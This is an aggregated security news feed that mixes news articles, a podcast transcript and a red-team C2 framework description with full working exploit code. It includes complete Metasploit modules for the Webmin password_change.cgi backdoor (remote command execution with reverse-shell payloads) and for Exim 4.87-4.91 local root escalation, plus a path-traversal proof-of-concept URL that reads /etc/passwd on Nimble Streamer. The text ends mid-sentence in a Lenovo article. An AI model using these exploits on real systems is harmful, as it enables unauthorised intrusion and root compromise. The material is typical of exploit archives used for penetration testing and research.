An aggregate of all of GoVanguard’s InfoSec & Cybersecurity related Posts, News, Threats and Data Feeds.

image
Covenant is a .NET command and control framework that aims to highlight the attack surface of .NET, make the use of offensive .NET tradecraft easier, and serve as a collaborative command and control platform for red teamers. Covenant is an ASP.NET Core, cross-platform application that includes a web-based interface that allows for multi-user collaboration. Quick-Start Guide Please see the Installation and Startup guide to get started with Covenant! The Wiki documents most of Covenant’s core features and how to use them. Features Covenant has several key features that make it useful and differentiate it from other command and control frameworks: Intuitive Interface – Covenant provides an intuitive web application to easily run a collaborative red team operation. Multi-Platform – Covenant targets .NET Core, which is multi-platform. This allows Covenant to run natively on Linux, MacOS, and Windows platforms. Additionally, Covenant has docker support, allowing it to run within a container on any system that has docker installed. Multi-User – Covenant supports multi-user collaboration. The ability to collaborate has become crucial for effective red team operations. Many users can interact with the same Covenant server and operate independently or collaboratively. API Driven – Covenant is driven by an API that enables multi-user collaboration and is easily extendible. Additionally, Covenant includes a Swagger UI that makes development and debugging easier and more convenient. Listener Profiles – Covenant supports listener “profiles” that control how the network communication between Grunt implants and Covenant listeners look on the wire. Encrypted Key Exchange – Covenant implements an encrypted key exchange between Grunt implants and Covenant listeners that is largely based on a similar exchange in the Empire project, in addition to optional SSL encryption. This achieves the cryptographic property of forward secrecy between Grunt implants. Dynamic Compilation – Covenant uses the Roslyn API for dynamic C# compilation. Every time a new Grunt is generated or a new task is assigned, the relevant code is recompiled and obfuscated with ConfuserEx, avoiding totally static payloads. Covenant reuses much of the compilation code from the SharpGen project, which I described in much more detail in a previous post. Inline C# Execution – Covenant borrows code and ideas from both the SharpGen and SharpShell projects to allow operators to execute C# one-liners on Grunt implants. This allows for similar functionality to that described in the SharpShell post, but allows the one-liners to be executed on remote implants. Tracking Indicators – Covenant tracks “indicators” throughout an operation, and summarizes them in the Indicators menu. This allows an operator to conduct actions that are tracked throughout an operation and easily summarize those actions to the blue team during or at the end of an assessment for deconfliction and educational purposes. This feature is still in it’s infancy and still has room for improvement. Developed in C# – Personally, I enjoy developing in C#, which may not be a surprise for anyone that has read my latest blogs or tools. Not everyone might agree that development in C# is ideal, but hopefully everyone agrees that it is nice to have all components of the framework written in the same language. I’ve found it very convenient to write the server, client, and implant all in the same language. This may not be a true “feature”, but hopefully it allows others to contribute to the project fairly easily. Questions and Discussion Have questions or want to chat more about Covenant? Join the #Covenant channel in the BloodHound Gang Slack . Download Covenant

This Metasploit module exploits a backdoor in Webmin versions 1.890 through 1.920. Only the SourceForge downloads were backdoored, but they are listed as official downloads on the project’s site. Unknown attacker(s) inserted Perl qx statements into the build server’s source code on two separate occasions: once in April 2018, introducing the backdoor in the 1.890 release, and in July 2018, reintroducing the backdoor in releases 1.900 through 1.920. Only version 1.890 is exploitable in the default install. Later affected versions require the expired password changing feature to be enabled.

MD5 | a2360d86ccb3b9b45e1315630a785649

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager

def initialize(info = {})
super(update_info(info,
'Name' => 'Webmin password_change.cgi Backdoor',
'Description' => %q{
This module exploits a backdoor in Webmin versions 1.890 through 1.920.
Only the SourceForge downloads were backdoored, but they are listed as
official downloads on the project's site.

Unknown attacker(s) inserted Perl qx statements into the build server's
source code on two separate occasions: once in April 2018, introducing
the backdoor in the 1.890 release, and in July 2018, reintroducing the
backdoor in releases 1.900 through 1.920.

Only version 1.890 is exploitable in the default install. Later affected
versions require the expired password changing feature to be enabled.
},
'Author' => [
'AkkuS', # (Özkan Mustafa Akkuş) Discovery and independent module
'wvu' # This module and updated information about the backdoor
],
'References' => [
['CVE', '2019-15107'], # y tho
['URL', 'http://www.webmin.com/exploit.html'],
['URL', 'https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html'],
['URL', 'https://blog.firosolutions.com/exploits/webmin/'],
['URL', 'https://github.com/webmin/webmin/issues/947']
],
'DisclosureDate' => '2019-08-10',
'License' => MSF_LICENSE,
'Platform' => ['unix', 'linux'],
'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
'Privileged' => true,
'Targets' => [
['Automatic (Unix In-Memory)',
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Version' => [
Gem::Version.new('1.890'), Gem::Version.new('1.920')
],
'Type' => :unix_memory,
'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_perl'}
],
['Automatic (Linux Dropper)',
'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X64],
'Version' => [
Gem::Version.new('1.890'), Gem::Version.new('1.920')
],
'Type' => :linux_dropper,
'DefaultOptions' => {'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'}
]
],
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
}
))

register_options([
Opt::RPORT(10000),
OptString.new('TARGETURI', [true, 'Base path to Webmin', '/'])
])

register_advanced_options([
OptBool.new('ForceExploit', [false, 'Override check result', false])
])
end

def check
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path)
)

unless res
vprint_error('Server did not respond')
return CheckCode::Unknown
end

version =
res.headers['Server'].to_s.scan(%r{MiniServ/([d.]+)}).flatten.first

unless version
vprint_error('Webmin version not detected')
return CheckCode::Unknown
end

version = Gem::Version.new(version)

vprint_status("Webmin #{version} detected")
checkcode = CheckCode::Detected

unless version.between?(*target['Version'])
vprint_error("Webmin #{version} is not a supported target")
return CheckCode::Safe
end

vprint_good("Webmin #{version} is a supported target")
checkcode = CheckCode::Appears

res = execute_command("echo #{token}")

unless res
vprint_error('Webmin did not respond to check command')
return checkcode
end

if res.body.include?('Password changing is not enabled!')
vprint_error('Expired password changing disabled')
return CheckCode::Safe
end

if res.body.include?(token)
vprint_good('Webmin executed a benign check command')
checkcode = CheckCode::Vulnerable
else
vprint_error('Webmin did not execute our check command')
return CheckCode::Safe
end

checkcode
end

def exploit
# These CheckCodes are allowed to pass automatically
checkcodes = [
CheckCode::Appears,
CheckCode::Vulnerable
]

unless checkcodes.include?(check) || datastore['ForceExploit']
fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')
end

print_status("Configuring #{target.name} target")

case target['Type']
when :unix_memory
print_status("Sending #{datastore['PAYLOAD']} command payload")
vprint_status("Generated command payload: #{payload.encoded}")

res = execute_command(payload.encoded)

if res && datastore['PAYLOAD'] == 'cmd/unix/generic'
print_warning('Dumping command output in full response body')

if res.body.empty?
print_error('Empty response body, no command output')
return
end

print_line(res.body)
end
when :linux_dropper
print_status("Sending #{datastore['PAYLOAD']} command stager")
execute_cmdstager
end
end

=begin
wvu@kharak:~/Downloads$ diff3 webmin-1.{890,930,920}/password_change.cgi
====2
1:1c
3:1c
#!/usr/bin/perl
2:1c
#!/usr/local/bin/perl
====1
1:12c
$in{'expired'} eq '' || die $text{'password_expired'},qx/$in{'expired'}/;
2:12c
3:12c
$miniserv{'passwd_mode'} == 2 || die "Password changing is not enabled!";
====3
1:40c
2:40c
$enc eq $wuser->{'pass'} || &pass_error($text{'password_eold'});
3:40c
$enc eq $wuser->{'pass'} || &pass_error($text{'password_eold'},qx/$in{'old'}/);
====3
1:200c
2:200c
# Show ok page
3:200c

wvu@kharak:~/Downloads$
=end
def execute_command(cmd, _opts = {})
send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'password_change.cgi'),
'headers' => {'Referer' => full_uri},
'vars_post' => {
# 1.890
'expired' => cmd,
# 1.900-1.920
'new1' => token,
'new2' => token,
'old' => cmd
}
}, 3.5)
end

def token
@token ||= Rex::Text.rand_text_alphanumeric(8..42)
end

end

Source

This Metasploit module exploits a flaw in Exim versions 4.87 to 4.91 (inclusive). Improper validation of recipient address in deliver_message() function in /src/deliver.c may lead to command execution with root privileges.

MD5 | 7e40628c1d0b1ff1461825cb7e5d4b58

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'expect'

class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking

include Msf::Exploit::FileDropper
include Msf::Post::File
include Msf::Post::Linux::Priv
include Msf::Post::Linux::System

def initialize(info = {})
super(update_info(info,
'Name' => 'Exim 4.87 - 4.91 Local Privilege Escalation',
'Description' => %q{
This module exploits a flaw in Exim versions 4.87 to 4.91 (inclusive).
Improper validation of recipient address in deliver_message()
function in /src/deliver.c may lead to command execution with root privileges
(CVE-2019-10149).
},
'License' => MSF_LICENSE,
'Author' =>
[
'Qualys', # Discovery and PoC (@qualys)
'Dennis Herrmann', # Working exploit (@dhn)
'Marco Ivaldi', # Working exploit (@0xdea)
'Guillaume André' # Metasploit module (@yaumn_)
],
'DisclosureDate' => '2019-06-05',
'Platform' => [ 'linux' ],
'Arch' => [ ARCH_X86, ARCH_X64 ],
'SessionTypes' => [ 'shell', 'meterpreter' ],
'Targets' =>
[
[
'Exim 4.87 - 4.91',
lower_version: Gem::Version.new('4.87'),
upper_version: Gem::Version.new('4.91')
]
],
'DefaultOptions' =>
{
'PrependSetgid' => true,
'PrependSetuid' => true
},
'References' =>
[
[ 'CVE', '2019-10149' ],
[ 'EDB', '46996' ],
[ 'URL', 'https://www.openwall.com/lists/oss-security/2019/06/06/1' ]
]
))

register_options(
[
OptInt.new('EXIMPORT', [ true, 'The port exim is listening to', 25 ])
])

register_advanced_options(
[
OptBool.new('ForceExploit', [ false, 'Force exploit even if the current session is root', false ]),
OptFloat.new('SendExpectTimeout', [ true, 'Timeout per send/expect when communicating with exim', 3.5 ]),
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
])
end

def base_dir
datastore['WritableDir'].to_s
end

def encode_command(cmd)
'x' + cmd.unpack('H2' * cmd.length).join('x')
end

def open_tcp_connection
socket_subsystem = Rex::Post::Meterpreter::Extensions::Stdapi::Net::Socket.new(client)
params = Rex::Socket::Parameters.new({
'PeerHost' => '127.0.0.1',
'PeerPort' => datastore['EXIMPORT']
})
begin
socket = socket_subsystem.create_tcp_client_channel(params)
rescue => e
vprint_error("Couldn't connect to port #{datastore['EXIMPORT']}, "
"are you sure exim is listening on this port? (see EXIMPORT)")
raise e
end
return socket_subsystem, socket
end

def inject_payload(payload)
if session.type == 'meterpreter'
socket_subsystem, socket = open_tcp_connection

tcp_conversation = {
nil => /220/,
'helo localhost' => /250/,
"MAIL FROM:" => /250/,
"RCPT TO:" => /250/,
'DATA' => /354/,
'Received:' => nil,
'.' => /250/
}

begin
tcp_conversation.each do |line, pattern|
Timeout.timeout(datastore['SendExpectTimeout']) do
if line
if line == 'Received:'
for i in (1..31)
socket.puts("#{line} #{i}n")
end
else
socket.puts("#{line}n")
end
end
if pattern
socket.expect(pattern)
end
end
end
rescue Rex::ConnectionError => e
fail_with(Failure::Unreachable, e.message)
rescue Timeout::Error
fail_with(Failure::TimeoutExpired, 'SendExpectTimeout maxed out')
ensure
socket.puts("QUITn")
socket.close
socket_subsystem.shutdown
end
else
unless cmd_exec("/bin/bash -c 'exec 3/dev/tcp/localhost/#{datastore['EXIMPORT']}' "
"&& echo true").chomp.to_s == 'true'
fail_with(Failure::NotFound, "Port #{datastore['EXIMPORT']} is closed")
end

bash_script = %|
#!/bin/bash

exec 3/dev/tcp/localhost/#{datastore['EXIMPORT']}
read -u 3 && echo $REPLY
echo "helo localhost" >&3
read -u 3 && echo $REPLY
echo "mail from:" >&3
read -u 3 && echo $REPLY
echo 'rcpt to:' >&3
read -u 3 && echo $REPLY
echo "data" >&3
read -u 3 && echo $REPLY
for i in $(seq 1 30); do
echo 'Received: $i' >&3
done
echo "." >&3
read -u 3 && echo $REPLY
echo "quit" >&3
read -u 3 && echo $REPLY
|

@bash_script_path = File.join(base_dir, Rex::Text.rand_text_alpha(10))
write_file(@bash_script_path, bash_script)
register_file_for_cleanup(@bash_script_path)
chmod(@bash_script_path)
cmd_exec("/bin/bash -c "#{@bash_script_path}"")
end

print_status('Payload sent, wait a few seconds...')
Rex.sleep(5)
end

def check_for_bash
unless command_exists?('/bin/bash')
fail_with(Failure::NotFound, 'bash not found')
end
end

def on_new_session(session)
super

if session.type == 'meterpreter'
session.core.use('stdapi') unless session.ext.aliases.include?('stdapi')
session.fs.file.rm(@payload_path)
else
session.shell_command_token("rm -f #{@payload_path}")
end
end

def check
if session.type == 'meterpreter'
begin
socket_subsystem, socket = open_tcp_connection
rescue
return CheckCode::Safe
end
res = socket.gets
socket.close
socket_subsystem.shutdown
else
check_for_bash
res = cmd_exec("/bin/bash -c 'exec 3</dev/tcp/localhost/#{datastore['EXIMPORT']} && "
"(read -u 3 && echo $REPLY) || echo false'")
if res == 'false'
vprint_error("Couldn't connect to port #{datastore['EXIMPORT']}, "
"are you sure exim is listening on this port? (see EXIMPORT)")
return CheckCode::Safe
end
end

if res =~ /Exim ([0-9.]+)/i
version = Gem::Version.new($1)
vprint_status("Found exim version: #{version}")
if version >= target[:lower_version] && version <= target[:upper_version]
return CheckCode::Appears
else
return CheckCode::Safe
end
end

CheckCode::Unknown
end

def exploit
if is_root?
unless datastore['ForceExploit']
fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.')
end
end

unless writable?(base_dir)
fail_with(Failure::BadConfig, "#{base_dir} is not writable")
end

if nosuid?(base_dir)
fail_with(Failure::BadConfig, "#{base_dir} is mounted nosuid")
end

unless datastore['PrependSetuid'] && datastore['PrependSetgid']
fail_with(Failure::BadConfig, 'PrependSetuid and PrependSetgid must both be set to true in order '
'to get root privileges.')
end

if session.type == 'shell'
check_for_bash
end

@payload_path = File.join(base_dir, Rex::Text.rand_text_alpha(10))
write_file(@payload_path, payload.encoded_exe)
register_file_for_cleanup(@payload_path)
inject_payload(encode_command("/bin/sh -c 'chown root #{@payload_path};"
"chmod 4755 #{@payload_path}'"))

unless setuid?(@payload_path)
fail_with(Failure::Unknown, "Couldn't escalate privileges")
end

cmd_exec("#{@payload_path} & echo ")
end
end

Source

image
Researchers are warning of an ongoing campaign exploiting vulnerabilities in a slew of WordPress plugins. The campaign is redirecting traffic from victims’ websites to a number of potentially harmful locations. Impacted by the campaign is a plugin called Simple 301 Redirects – Addon – Bulk Uploader as well as several plugins made by developer NicDark (now rebranded as “Endreww”). All plugins have updates available resolving the vulnerabilities – but researchers in a Friday post warned that WordPress users should update as soon as possible to avoid attack. “Redirect locations were a typical spread, whatever ad network is running it likely does some geolocation and tracking to decide where to send you,” said Mikey Veenstra with Wordfence told Threatpost. “Most recent injections don’t even appear to be functional, suggesting some breakdown in infrastructure or a transition of some sort.” Veenstra told Threatpost that exploitation began on or around July 31, just as the first disclosure for one of the vulnerabilities was published. “The plugin repository team quickly removed the rest of NicDark’s plugins from the repository, which drew attention and revealed that they all suffered similar vulnerabilities,” he told Threatpost. “So attacks probing for all of them began pretty quickly, despite many of the plugins having fairly small install bases.” Vulnerabilities Veenstra told Threatpost that he found at least five plugins by NicDark with flaws being exploited as part of the campaign. These plugins are: Components For WP Bakery Page Builder, Donations,Travel Management, Booking and Learning Courses. The flaws (all recently patched) are exploited by similar AJAX requests, according to Wordfence. In each case the plugin registers a nopriv_ AJAX action, which is responsible for importing various WordPress settings. Unauthenticated visitors can successfully send these AJAX requests in order to modify the siteurl setting of the victim’s site – thus sending visitors to other locations. “The result of this modification is that all of the victim site’s scripts will attempt to load relative to that injected path,” researchers said. “In effect, this replaces all of a site’s loaded JavaScript with a file under the attacker’s control.” The other impacted plugin, Simple 301 Redirects – Addon – Bulk Uploader, developed by Webcraftic, adds functionality to a plugin called the Simple 301 Redirects plugin, which enables the redirect of requests to another pages. The plugin has more than 10,000 installations. The plugin has a recently-patched vulnerability that enables unauthenticated attackers to inject their own 301 redirect rules onto a victim’s website. That means that a bad actor has the ability upload a CSV file that could import a bulk set of site paths and redirect destinations. Ultimately, if a vulnerable site processes an uploaded malicious CSV file it will begin redirecting all of its traffic to the addresses provided. Researchers said they have also identified related attacks against other formerly-vulnerable plugins, including Woocommerce User Email Verification, Yellow Pencil Visual Theme Customizer, Coming soon and Maintenance Mode and Blog Designer. “The domains used by the attackers in performing these script injections and redirects rotate with some frequency. New domains appear every few days, and attacks involving older domains taper off,” researchers said. “At this time, many of the redirect domains associated with these attacks appear to have been decommissioned, despite the fact that these domains still show up in active attacks at the time of this writing.” Plugins continue to be a security thorn in WordPress’ side. According to a Imperva report, almost all (98 percent) of WordPress vulnerabilities are related to plugins that extend the functionality and features of a website or a blog. Other recent vulnerabilities found in WordPress plugins include WP Live Chat and Yuzo Related Posts. Interested in more on the internet of things (IoT)? Don’t miss our free Threatpost webinar, “IoT: Implementing Security in a 5G World.” Please join Threatpost senior editor Tara Seals and a panel of experts as they offer enterprises and other organizations insight about how to approach security for the next wave of IoT deployments, which will be enabled by the rollout of 5G networks worldwide. Click here to register.

Source

Nimble Stream versions 3.0.2-2 up to 3.5.4.9 suffer from a directory traversal vulnerability.

MD5 | 87b6edb28bc7d0b0f16401f7be58e5ff

# Nimble Streamer 3.0.2-2 to 3.5.4-9 - Path Traversal
# Exploit Author: MAYASEVEN
# Source at "https://mayaseven.com/nimble-directory-traversal-in-nimble-streamer-version-3-0-2-2-to-3-5-4-9/"
# Published on 08/04/2019
# Vendor Homepage at "https://wmspanel.com/nimble"
# Affected Version 3.0.2-2 to 3.5.4-9
# Tested on 3.5.4-9
# CVE-2019-11013 Nimble Streamer 3.0.2-2 to 3.5.4-9 Path Traversal
# Description: Nimble Streamer 3.0.2-2 through 3.5.4-9 has a ../ directory traversal vulnerability.
# Successful exploitation could allow an attacker to traverse the file system to access
# files or directories that are outside of the restricted directory on the remote server.


POC :
- http://somesite.com/demo/file/../../../../../../../../etc/passwd%00filename.mp4/chunk.m3u8?nimblesessionid=1484448

Source

image
Why did Valve-owner Steam say it made a “mistake” turning a researcher away from its bug bounty program? Who was behind a backdoor that was purposefully introduced into a utility utilized by Unix and Linux servers? And why is Facebook coming under fire for its “Clear History” feature? Threatpost editors Lindsey O’Donnell and Tom Spring break down the top stories of the week that have the infosec space buzzing, including: A backdoor that was intentionally planted in Webmin in 2018 and found during the DEF CON 2019 security conference when researchers stumbled upon malicious code. A researcher disclosing a zero-day vulnerability (the second in two weeks) for the Steam gaming client after he said he was barred from the bug bounty program of Steam’s owner, Valve. Facebook being met with vitriol after users discovered its “Clear History” feature, rolled out in some countries this week, wasn’t what they had thought. For the full podcast, listen below or download here. Below is a lightly-edited transcript of the news wrap podcast. Lindsey O’Donnell: I’m Lindsey O’Donnell with Threatpost, and I’m here today with Tom Spring to break down for you the top news of this week ended August 22. Tom, thanks for joining the Threatpost podcast today. How are you doing today? Tom Spring: I’m doing great. Thanks for asking. LO: Good. Well, we’re just ending a big week. But we should probably talk about one of the biggest stories that you wrote about that garnered the most interest for a lot of Threatpost readers, which was the backdoor that was discovered on the Webmin utility for Unix servers. That was a really interesting story. TS: Yeah, it just goes to show you how susceptible some of these libraries are to manipulation and the clever way that people are now abusing – whether it be a repository or whether it be a Git library – it’s really spooky, this backdoor that was found, just recently, a couple weeks ago. I should say, even just earlier this week. It’s been a evolving story. It touches on DEF CON and touches on zero days. But in a nutshell, you’re right, there was a backdoor found in this utility for Linux and Unix servers, called Webmin that could give attackers basically control over their servers, and it was sort of a worst case scenario. But what’s interesting about it is the seeds of this attack, of this vulnerability, were planted in – I believe it was April 2018 — I’m not too sure of the month. But it was last year, there was a library that was put into the code that is behind this Webmin tool, and they backdated it, and it kind of existed and it was not exploited, and if I understand things correctly, it went unnoticed for almost a year. And then during DEF CON, what happened was researchers were looking at the code for Webmin, and they discovered a way to exploit the utility, using the vulnerability found in a CGI script “password change”. And that was the first red flag that led to more attention to what was going on with this script, and what they discovered was that it was not a mistake and it was intentionally inserted into GitHub, and it was backdated as several versions of the Webmin went out to users. And then you know, sort of everything unraveled, they patched it, it has a happy ending. And now, I think the patches went out, the community is aware, the Webmin utility has been fixed. Obviously, there’s probably a number of different, there’s probably a percentage that hasn’t been patched yet. But I think there’s a lot of awareness around this problem. But we’ve gotten some comments on the story asking about who’s behind this. It’s one thing to say, “Okay, well, we understand what happened, but who is behind inserting this malicious code?” And then the other feedback that we’ve been getting on this story is, is just how difficult it is to rely on one set of eyes, or even a couple set of eyes in terms of looking at code, and making sure it’s secure, and not trusting a lot of these commits to make sure that they’re saying like, that it’s not a foregone conclusion that it’s secure. And it’s, I think it’s really kicked up quite a bit of discussion within the open source community in terms of how to handle problems like this and we see a lot of this within repositories in terms of malicious code, or just bad code reuse, in terms of libraries with software developers, it really is a tremendous challenge. And I think this was a really interesting example of how this can be abused by a malicious actor. LO: Did Webmin give any indication about what it might change in the future to stop something like this from happening again? Or is that up to speculation at this point about what can be done? TS: Well, so they’re going to be updating their build process to use checked in code from GitHub, rather than a local directory that is kept in sync – that had a lot to do with how this was overlooked. They’re going to be – These are suggestions for users as well – rotating all passwords and keys accessible from old build systems and auditing all GitHub check ins over the past year to look for commits, that may have introduced similar vulnerabilities. So, like I said, again, you hear a lot about the preventative measures that are being taken that are taking place to prevent these things from happening in the future. We’re seeing more code dependency, more norm code reuse dependency. And I think we’ll probably hear about more tools, more solutions, and repositories talking more about making noise about how they’re making sure that what they’re doing is better than what other repositories are doing to keep things safe. LO: Right. Yeah, for sure. Well, I wrote an interesting story too this week. So I covered an ongoing story that Tara actually reported first last week, and that we chatted about on last week’s news wrap; Tom, if you remember the zero day that was discovered in Steam by a researcher last week. TS: Yeah. LO: So that story has continued into an entire whirlwind of drama this week. The researcher said that he was barred from Steam’s owner, Valve’s, bug bounty program after disclosing that initial zero day vulnerability for the Steam gaming client. And then on the heels of that he also disclosed another zero day privilege escalation vulnerability. So it was a little crazy. And then, just last night, Thursday evening, according to reports, after all that, Valve patched the recent Steam zero day, and essentially called turning away this researcher who had found the zero days a big mistake, and they updated their bug bounty program to address the issue. TS: And Lindsey, was this was this HackerOne? I’m just trying to figure out who’s actually apologetic for what essentially, it seems like getting this this researcher angry. LO: Yeah. So this was Valve. But let me take a step back. If you remember, last week, the researcher had some back and forth with valve about the initial flaw that he had disclosed via its HackerOne bug bounty platform. And essentially, it came down to the fact that Valve didn’t consider a local escalation of privilege bugs to be part of its bug bounty platform. TS: Yeah, and we got a lot of comments that were in support of Valve’s position on that, alot of fanboys. But go ahead. LO: So anyways, what happened was eventually, Valve told the researcher that he was not allowed to publicly release the bug details, but he did anyways, 45 days after the initial disclosure, and then after that, the researcher said that things essentially escalated and that he was banned from the platform. That led to a big discussion around kind of disclosure in the hacker community. But you know, I guess the story, it kind of has a happy ending at this point, if Valve has admitted that it made a mistake and banning the researcher. And the other part was that it also updated its bug bounty program to now start accepting local privilege escalation class vulnerabilities. TS: That really kind of warms my heart because there’s so much animosity between these bug bounty programs and the researchers or at least there can be and, if you were to ask me yesterday how this was going to play out or how it was playing out, I would have I would have said another bug bounty researcher standoff gone awry. I had little to no hope that that there was going to be any resolution on this. And it has been a big soap opera, really interesting stuff. LO: It’s led to discussion around, as you said Tom, disclosure issues like these in the hacker community. And Katie Moussouris has weighed in and a couple of others, and it’s kind of been split the reactions that I’ve seen online. TS: What’s Katie’s take on that? I’m just curious. Good for Valve for apologizing for the mistake in their dismissal of the vulnerabilities. Their bounty triage provider chalked it up to disclosure being a “murky process”. Basic triage is “murky”? Isn’t the outsourced service supposed to navigate that?https://t.co/Hqk4GzPWIp — Katie Moussouris (@k8em0) August 22, 2019 LO: Yeah. I mean, she was basically pointing out how this is yet another kind of issue that we’re seeing when it comes to bug bounty programs. Because as you know, Katie, she has talked a lot about some of the hurdles that bug bounty programs kind of need to go over. TS: Yes, she’s a very strong advocate for bug bounty programs and getting them right, that’s for sure. LO: Yeah. So I mean, on Twitter, she did say that vendors have labeled full disclosure is responsible and planted onus on researchers, while completely skirting their own liability and negligence. And basically said, if the vendor failed to address it, suddenly, it’s the researchers fault for speaking up, and how is that fair? TS: Yeah, I’m sure you’ve spoken to researchers that are very unhappy about bug bounty programs, they get involved in them. And they’ve got handcuffs on, they find the vulnerabilities and they’ve signed non-disclosure agreements. And the vendor sits on the vulnerability and doesn’t fix it. And the researcher wants either to get paid and get notoriety, or just wants the internet to be a safer place for things to get fixed. And they just basically have a gag order. And if they want to go public with the vulnerability, they risk the backlash, and I’m not too sure if that’s what happened in this case. But Valve and Steam, it doesn’t get much bigger in terms of an online gaming community. And, I don’t know why anybody would be sitting on a bug, a dangerous bug impacting potentially as many users as is where they use Steam, if it’s not hundreds of millions, at least 100 million, LO: I feel like there needs to be some sort of mediator almost, between these companies, and the researchers who are participating in their programs to what level platforms like HackerOne, like a Bugcrowd play in that. But I do feel as though for something like this there, there needs to be someone who’s like, either to the vendor, like you can’t just kick someone off because they they reported something. And then on the other hand, they need someone who can go to researchers who may be having their own their own issues. And this story is definitely split up, some are arguing that the incident points to an issue and bug bounty platforms, as I said, which is that you can’t just ban someone from the platform after they find something that you don’t like, but then others are arguing that the researcher shouldn’t have disclosed the second bug by in this method by essentially going around Valve and being like, well, you banned me. So now I’m going to disclose this zero day vulnerability. But yeah, I mean, in terms of other big news this week, did you see that Facebook Clear History button news about them kind of rolling out their new Clear History feature? That was kind of interesting. TS: Yeah. Well, I guess it doesn’t have much of an impact for folks here in the US, please yet. And it’s not anything to get too excited about either. If you know more about it, please do share. But I don’t think we can all breathe a sigh of relief quite yet in terms of Facebook and the data that they collect. LO: As you mentioned, it sounds like this is just being rolled out in Ireland, South Korea or Spain, so like very random countries that don’t affect us here in the US. But yeah, I was reading reports and articles that were saying that while Facebook has this Clear History button that’s supposed to kind of clear all your data. And consumers were really wanting that ability to wipe out all the data that Facebook has on us. It sounds like it’s not really what people had hoped for and what they had expected. And it doesn’t really truly clear all of our history. It sounds like essentially, it just like still takes your data, but it will anonymize you so that I guess your data isn’t attached to you. But it’s still collecting your data, essentially. And I think that’s what has people riled up at this point. TS: Yeah. And I think that by virtue of the fact that you actually push the button, it sort of red flags you as well, and it takes extra effort to anonymize you, but also to scrutinize you at the same time. And I gotta figure, this is one of those feel good things that doesn’t serve anybody but Facebook, you know, it says, Oh, we have we’ve got a button for that now, and you don’t have to worry about it, we’re going to see a lot more of these types of privacy pushes. Some of them, I know that you just wrote about something that Google’s working on as well, where you’ve got the big tech giants, who are feeling the heat from government, whether it be the US government, or foreign governments are very concerned about data privacy, and about the amount of information that’s being collected. And they’re coming up with a lot of new solutions, to try to address that situation. And I think what they’re doing is they obviously don’t want to hurt their bottom line. And they’re coming as close as they can to offering a genuine solution without actually having them hurt the billions in profit that they make every year. It’s a fine line that they’re walking, I think they’re really trying to head off a lot of the possible regulations that are coming down the pike by saying, look, we’ve got a button for that, look, we’ve got a browser extension for that. LO: Yeah, I mean, it is interesting, because what the alternative would be is that we’re essentially consuming free content online, in return for our data. So the other option, that Facebook that companies like Google are telling us is that we that we would have to pay instead. TS: I don’t know, Lindsey, it’s not a black and white issue. I don’t think you’re suggesting it is. But you know, if they’re going to say you can use Google Chrome and surf the internet for free, because we can take every little tiny piece of data that we can about you and monetize it, there has to be there has to be a middle ground. And I have I’ve heard, we’re seeing micro payments becoming a bigger reality. I’m not familiar with some of the success stories that newspapers and and other websites are having in terms of making, giving access these walled gardens that are going up, left and right. I mean, maybe, maybe, maybe that’s where we’re headed. I don’t see Facebook ever charging for access to their world or or Google Chrome. I mean, it kind of might be nice if you pay $10 a year, you don’t have to worry about being tracked as much. But I still feel like even if you paid $10 a year to Facebook, and they said they weren’t tracking you, they probably be like, oops, I’m sorry, you’re tracking you. LO: So we’re basically almost into deep at this point. TS: Yeah, I don’t know. But I just don’t buy the argument, that you’re getting it for free. So we should be able to collect every website that you go to browser fingerprints, IP address, where you do your banking, your health care provider – mean, these guys, these guys are making billions and trillions. And if they weren’t so hungry to make to keep their bottom line and might be able to figure out how to find a little more of a middle ground where they don’t have to completely suck up every little detail of your life to be able to monetize it. LO: Yeah, that’s fair. I don’t know. I think at this point like you mentioned, they’re really trying to kind of stave off regulation and who knows if that’s going to work or not at this point, because it is getting so much traction, but all right. Well, I think we’ve had a very busy week, Tom, thanks for coming on to talk a little bit more about the biggest stories that Threatpost wrote about this week. Hopefully, we’ll have a quieter weekend. TS: Yeah. Yeah, for sure. Thanks, Lindsey. LO: All right. Thanks. Catch us next week on the Threatpost podcast.

Source

image
Another flaw has been found in Lenovo’s decommissioned Lenovo Solution Centre software, preinstalled on millions of older-model PCs made by the world’s leading computer maker. The vulnerability is a privilege escalation flaw that can be used to execute arbitrary code on a targeted system, giving an adversary Administrator or SYSTEM-level privileges. Research come from Pen Test Partners, who found the flaw (CVE-2019-6177) and said the vulnerability is tied to its much-maligned Lenovo Solution Center (LSC) software. “The bug itself is a DACL (discretionary access control list) overwrite, which means that a high-privileged Lenovo process indiscriminately overwrites the privileges of a file that a low-privileged user is able to control,” wrote researchers at Pen Test Partners in a technical description of the bug posted Thursday. Lenovo issued a security bulletin regarding this bug and recommended users upgrade to a similar utility called Lenovo Vantage. Researchers describe the bug as giving hackers with low-privilege access to a PC the ability to write a “hardlink” file to a controllable location. This “hardlink” file would be a low-privilege “pseudo file” that could be used to point to a second privileged file. “When the Lenovo process runs, it overwrites the privileges of the hardlinked file with permissive privileges, which lets the low-privileged user take full control of a file they shouldn’t normally be allowed to,” researchers wrote. “This can, if you’re clever, be used to execute arbitrary code on the system with Administrator or SYSTEM privileges.” The software’s intended purpose is to monitor the overall health of the PC. It monitors the battery, firewall and checks for driver updates. It comes pre-installed on the majority of Lenovo PCs, including desktop and laptop, for both businesses and consumers. The problematic version is 03.12.003, which Lenovo said is no longer supported. According to 